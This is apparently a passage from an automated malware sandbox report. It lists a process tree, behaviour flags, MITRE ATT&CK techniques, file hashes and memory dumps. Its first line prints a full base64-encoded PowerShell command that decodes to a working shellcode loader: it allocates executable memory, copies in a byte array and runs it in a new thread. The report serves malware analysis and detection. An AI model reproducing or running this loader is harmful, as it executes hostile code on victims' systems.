"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABTAEIAYQA1ACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAUwBCAGEANQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAZABkACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAYgBhACwAMAB4AGMAZAAsADAAeAAwADYALAAwAHgAYQBiACwAMAB4AGIAMgAsADAAeAAzADMALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0ADcALAAwAHgAMwAxACwAMAB4ADUAMAAsADAAeAAxAGEALAAwAHgAOAAzACwAMAB4AGUAOAAsADAAeABmAGMALAAwAHgAMAAzACwAMAB4ADUAMAAsADAAeAAxADYALAAwAHgAZQAyACwAMAB4ADMAOAAsADAAeABmAGEALAAwAHgANAAzACwAMAB4ADMAMAAsADAAeABjADIALAAwAHgAMAAzACwAMAB4ADkANAAsADAAeAA1ADUALAAwAHgANABiACwAMAB4AGUANgAsADAAeABhADUALAAwAHgANQA1ACwAMAB4ADIAZgAsADAAeAA2ADIALAAwAHgAOQA1ACwAMAB4ADYANQAsADAAeAAyADQALAAwAHgAMgA2ACwAMAB4ADEAYQAsADAAeAAwAGQALAAwAHgANgA4ACwAMAB4AGQAMwAsADAAeABhADkALAAwAHgANgAzACwAMAB4AGEANAAsADAAeABkADQALAAwAHgAMQBhACwAMAB4AGMAOQAsADAAeAA5ADIALAAwAHgAZABiACwAMAB4ADkAYgAsADAAeAA2ADIALAAwAHgAZQA2ACwAMAB4ADcAYQAsADAAeAAxADgALAAwAHgANwA5ACwAMAB4ADMAYQAsADAAeAA1AGQALAAwAHgAMgAxACwAMAB4AGIAMgAsADAAeAA0AGYALAAwAHgAOQBjACwAMAB4ADYANgAsADAAeABhAGYALAAwAHgAYgBkACwAMAB4AGMAYwAsADAAeAAzAGYALAAwAHgAYgBiACwAMAB4ADEAMwAsADAAeABlADEALAAwAHgAMwA0ACwAMAB4AGYAMQAsADAAeABhAGYALAAwAHgAOABhACwAMAB4ADAANwAsADAAeAAxADcALAAwAHgAYgA3ACwAMAB4ADYAZgAsADAAeABkAGYALAAwAHgAMQA2ACwAMAB4ADkANgAsADAAeAAyADEALAAwAHgANgBiACwAMAB4ADQAMQAsADAAeAAzADgALAAwAHgAYwAzACwAMAB4AGIAOAAsADAAeABmADkALAAwAHgANwAxACwAMAB4AGQAYgAsADAAeABkAGQALAAwAHgAYwA0ACwAMAB4AGMAOAAsADAAeAA1ADAALAAwAHgAMQA1ACwAMAB4AGIAMgAsADAAeABjAGIALAAwAHgAYgAwACwAMAB4ADYANwAsADAAeAAzAGIALAAwAHgANgA3ACwAMAB4AGYAZAAsADAAeAA0ADcALAAwAHgAYwBlACwAMAB4ADcANgAsADAAeAAzADkALAAwAHgANgBmACwAMAB4ADMAMQAsADAAeAAwAGQALAAwAHgAMwAzACwAMAB4ADkAMwAsADAAeABjAGMALAAwAHgAMQA1ACwAMAB4ADgAMAAsADAAeABlADkALAAwAHgAMABhACwAMAB4ADkAMAAsADAAeAAxADMALAAwAHgANAA5ACwAMAB4AGQAOAAsADAAeAAwADIALAAwAHgAZgA4ACwAMAB4ADYAYgAsADAAeAAwAGQALAAwAHgAZAA0ACwAMAB4ADgAYgAsADAAeAA2ADAALAAwAHgAZgBhACwAMAB4ADkAMwAsADAAeABkADQALAAwAHgANgA0ACwAMAB4AGYAZAAsADAAeAA3ADAALAAwAHgANgBmACwAMAB4ADkAMAAsADAAeAA3ADYALAAwAHgANwA3ACwAMAB4AGEAMAAsADAAeAAxADAALAAwAHgAYwBjACwAMAB4ADUAMwAsADAAeAA2ADQALAAwAHgANwA4ACwAMAB4ADkANgAsADAAeABmAGEALAAwAHgAMwBkACwAMAB4ADIANAAsADAAeAA3ADkALAAwAHgAMAAzACwAMAB4ADUAZAAsADAAeAA4ADcALAAwAHgAMgA2ACwAMAB4AGEAMQAsADAAeAAxADUALAAwAHgAMgBhACwAMAB4ADMAMgAsADAAeABkADgALAAwAHgANwA3ACwAMAB4ADIAMwAsADAAeABmADcALAAwAHgAZAAwACwAMAB4ADgANwAsADAAeABiADMALAAwAHgAOQBmACwAMAB4ADYAMwAsADAAeABmAGIALAAwAHgAOAAxACwAMAB4ADAAMAAsADAAeABkAGYALAAwAHgAOQAzACwAMAB4AGEAOQAsADAAeABjADkALAAwAHgAZgA5ACwAMAB4ADYANAAsADAAeABiAGIALAAwAHgAZABlACwAMAB4AGYAYQAsADAAeABiAGIALAAwAHgAMAAzACwAMAB4ADgAZQAsADAAeAAwADUALAAwAHgAMwBjACwAMAB4ADcANAAsADAAeAA4ADYALAAwAHgAYwAxACwAMAB4ADYAOAAsADAAeAAyADQALAAwAHgAYgAwACwAMAB4AGUAMAAsADAAeAAxADAALAAwAHgAYQBmACwAMAB4ADQAMAAsADAAeAAwAGQALAAwAHgAYwA1ACwAMAB4ADUAYQAsADAAeAA0AGIALAAwAHgAOQA5ACwAMAB4ADIANgAsADAAeAAzADIALAAwAHgAZAAyACwAMAB4AGMAYgAsADAAeABjAGYALAAwAHgANAAxACwAMAB4AGUANQAsADAAeABjAGMALAAwAHgAMAAwACwAMAB4AGMAZgAsADAAeAAwADMALAAwAHgANAAyACwAMAB4ADQAZgAsADAAeAA5AGYALAAwAHgAOQBiACwAMAB4ADIAMgAsADAAeAAzAGYALAAwAHgANQBmACwAMAB4ADQAYwAsADAAeABjAGEALAAwAHgANQA1ACwAMAB4ADUAMAAsADAAeABiADMALAAwAHgAZQBhACwAMAB4ADUANQAsADAAeABiAGEALAAwAHgAZABjACwAMAB4ADgAMAAsADAAeABiADkALAAwAHgAMQAzACwAMAB4AGIANAAsADAAeAAzAGMALAAwAHgAMgAzACwAMAB4ADMAZQAsADAAeAA0AGUALAAwAHgAZABkACwAMAB4AGEAYwAsADAAeAA5ADQALAAwAHgAMgBhACwAMAB4AGQAZAAsADAAeAAyADcALAAwAHgAMQBiACwAMAB4AGMAYQAsADAAeAA5ADMALAAwAHgAYwBmACwAMAB4ADUANgAsADAAeABkADgALAAwAHgANAAzACwAMAB4ADIAMAAsADAAeAAyAGQALAAwAHgAOAAyACwAMAB4AGMANQAsADAAeAAzAGYALAAwAHgAOQBiACwAMAB4AGEAOQAsADAAeABlADkALAAwAHgAZAA1ACwAMAB4ADIAMAAsADAAeAA3ADgALAAwAHgAYgBlACwAMAB4ADQAMQAsADAAeAAyAGIALAAwAHgANQBkACwAMAB4ADgAOAAsADAAeABjAGQALAAwAHgAZAA0ACwAMAB4ADgAOAAsADAAeAA4ADMALAAwAHgAYwA0ACwAMAB4ADQAMAAsADAAeAA3ADMALAAwAHgAZgBiACwAMAB4ADIAOAAsADAAeAA4ADUALAAwAHgANwAzACwAMAB4AGYAYgAsADAAeAA3AGUALAAwAHgAYwBmACwAMAB4ADcAMwAsADAAeAA5ADMALAAwAHgAMgA2ACwAMAB4AGEAYgAsADAAeAAyADcALAAwAHgAOAA2ACwAMAB4ADIAOAAsADAAeAA2ADYALAAwAHgANQA0ACwAMAB4ADEAYgAsADAAeABiAGQALAAwAHgAOAA5ACwAMAB4ADAAZAAsADAAeABjADgALAAwAHgAMQA2ACwAMAB4AGUAMgAsADAAeABiADMALAAwAHgAMwA3ACwAMAB4ADUAMAAsADAAeABhAGQALAAwAHgANABjACwAMAB4ADEAMgAsADAAeAA2ADAALAAwAHgAOQAxACwAMAB4ADkAYQAsADAAeAA1AGEALAAwAHgAMQA2ACwAMAB4AGYAYgAsADAAeAAxAGUAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGwAYgA1ADgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAGwAYgA1ADgALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGwAYgA1ADgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2876

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ctjn2rsq\ctjn2rsq.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:676

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8801.tmp" "c:\Users\Admin\AppData\Local\Temp\ctjn2rsq\CSCA6CD66B063FE4870B2F338FA1D6CDBD0.TMP"
6⤵
PID:3200

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES8801.tmp
Filesize
1KB

MD5
972e5311bfb926567027c7f225d557ea

SHA1
8730a4187032258fbbfb800c1d881d2685424414

SHA256
08c8a56d2c05a07e126d47d331f8adf149bbdab8ba667d42f83d252654b56e0c

SHA512
a6860c5454371e7c53892734929afe53a98aee0b495c6871198dd9faece98a52e7416a6fde0fe4a568193bd8ee73dd8aa5a31469a9b94288e1552c32b484960b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ctjn2rsq\ctjn2rsq.dll
Filesize
3KB

MD5
1d522d80e6e2689a1f0ea1c5a645fb46

SHA1
206c81a8220ab1e78d108722378d6a0183d2c870

SHA256
38fa54bda9ae1646f89d7347163004e7c9a9e8b63296ab745187abe894822b81

SHA512
aa1a739bfca819169a18f839f3829c700a8486f24891405614fe7c5ee931d441171edcd47749a83fddc65ef3e3e70669aef1e210aec52089e6886d735ae1bb94

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ctjn2rsq\CSCA6CD66B063FE4870B2F338FA1D6CDBD0.TMP
Filesize
652B

MD5
59269672889f99915fc53d52c5a2ecb9

SHA1
f45e4dec7bba9b7db78b131dfbee21518c46bc1b

SHA256
09d16ee2e45c70be1379bb792b7819188f44224c761fa554067285c83b759e68

SHA512
31003b0672e5ed1ed09e970f0ce21b18e06ca9d7312bfb920b9ed66c0088b0dd03e2a4bb00aa3e60f2cdedd2fcc283302f3b0ea66f81b7da7a38d88015181b0a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ctjn2rsq\ctjn2rsq.0.cs
Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ctjn2rsq\ctjn2rsq.cmdline
Filesize
369B

MD5
823793f37a0de4207101171a827a6b3d

SHA1
06f5a6dca1ccee1fe2f97ee1cd9aa6ad2a876935

SHA256
cbcf10af057b50ca4678d2bf06bcbe3656cfc0d68d5cc58c7a94115c1ca51e4e

SHA512
69f4ffb522cc2c8a9c2f255c30b6714d7897898c440481185c5140975addea2cbeca532bd1b05716f73feb71030eff360953408805ef02c8c23607972ab6c231

Download Submit
memory/676-144-0x0000000000000000-mapping.dmp

Download
memory/2028-131-0x00000138BA320000-0x00000138BA342000-memory.dmp

Filesize
136KB

Download
memory/2028-133-0x00007FFC6FA00000-0x00007FFC704C1000-memory.dmp

Filesize
10.8MB

Download
memory/2028-130-0x0000000000000000-mapping.dmp

Download
memory/2436-135-0x00007FFC6FA00000-0x00007FFC704C1000-memory.dmp

Filesize
10.8MB

Download
memory/2436-132-0x0000000000000000-mapping.dmp

Download
memory/2876-140-0x0000000005E20000-0x0000000005E86000-memory.dmp

Filesize
408KB

Download
memory/2876-141-0x00000000064B0000-0x00000000064CE000-memory.dmp

Filesize
120KB

Download
memory/2876-143-0x0000000006990000-0x00000000069AA000-memory.dmp

Filesize
104KB

Download
memory/2876-142-0x0000000007D40000-0x00000000083BA000-memory.dmp

Filesize
6.5MB

Download
memory/2876-139-0x0000000005BC0000-0x0000000005C26000-memory.dmp

Filesize
408KB

Download
memory/2876-138-0x00000000054D0000-0x00000000054F2000-memory.dmp

Filesize
136KB

Download
memory/2876-137-0x0000000005510000-0x0000000005B38000-memory.dmp

Filesize
6.2MB

Download
memory/2876-136-0x0000000002A80000-0x0000000002AB6000-memory.dmp

Filesize
216KB

Download
memory/2876-134-0x0000000000000000-mapping.dmp

Download
memory/3200-147-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing